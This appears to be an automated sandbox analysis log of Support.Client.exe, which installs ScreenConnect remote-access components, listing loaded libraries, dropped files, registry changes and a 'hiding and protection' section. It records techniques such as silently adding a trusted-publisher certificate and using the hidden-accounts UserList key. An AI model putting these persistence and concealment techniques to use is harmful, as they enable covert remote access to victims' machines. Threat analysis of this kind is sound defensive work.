                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Support.Client.exeStatic PE information: certificate valid
                  Source: Support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Support.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140978000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2133716671.0000000002DA2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2946951475.000000001B400000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2939873486.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2129224859.000000000021D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140449000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2134375244.0000000005242000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: Support.Client.exeStatic PE information: real checksum: 0x1bda6 should be: 0x19cbe
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01BC0 push ecx; ret 0_2_00C01BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B898E01 push 8B495D39h; iretd 1_2_00007FFD9B898E0C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B887D00 push eax; retf 1_2_00007FFD9B887D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B898D31 push 8B495D39h; iretd 1_2_00007FFD9B898D3C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B88842E pushad ; ret 1_2_00007FFD9B88845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A9360 push cs; ret 1_2_00007FFD9B8A937F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A9321 push cs; ret 1_2_00007FFD9B8A937F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8800BD pushad ; iretd 1_2_00007FFD9B8800C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AA650 pushfd ; ret 1_2_00007FFD9B8AA5E6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B88845E push eax; ret 1_2_00007FFD9B88846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B884162 push eax; ret 9_2_00007FFD9B884163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B8830BA push eax; iretd 9_2_00007FFD9B8830BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B88401A push eax; iretd 9_2_00007FFD9B88401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B882FDA pushad ; retf 9_2_00007FFD9B882FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B883F3A pushad ; retf 9_2_00007FFD9B883F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B882E18 push eax; ret 9_2_00007FFD9B882E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB97B30 push ss; iretd 12_2_00007FFD9BB97B31
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (12a62791-f49c-4806-9cc2-0b20f2ce6bb8)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.2133716671.0000000002DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2946951475.000000001B400000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2939873486.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Support.Client.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
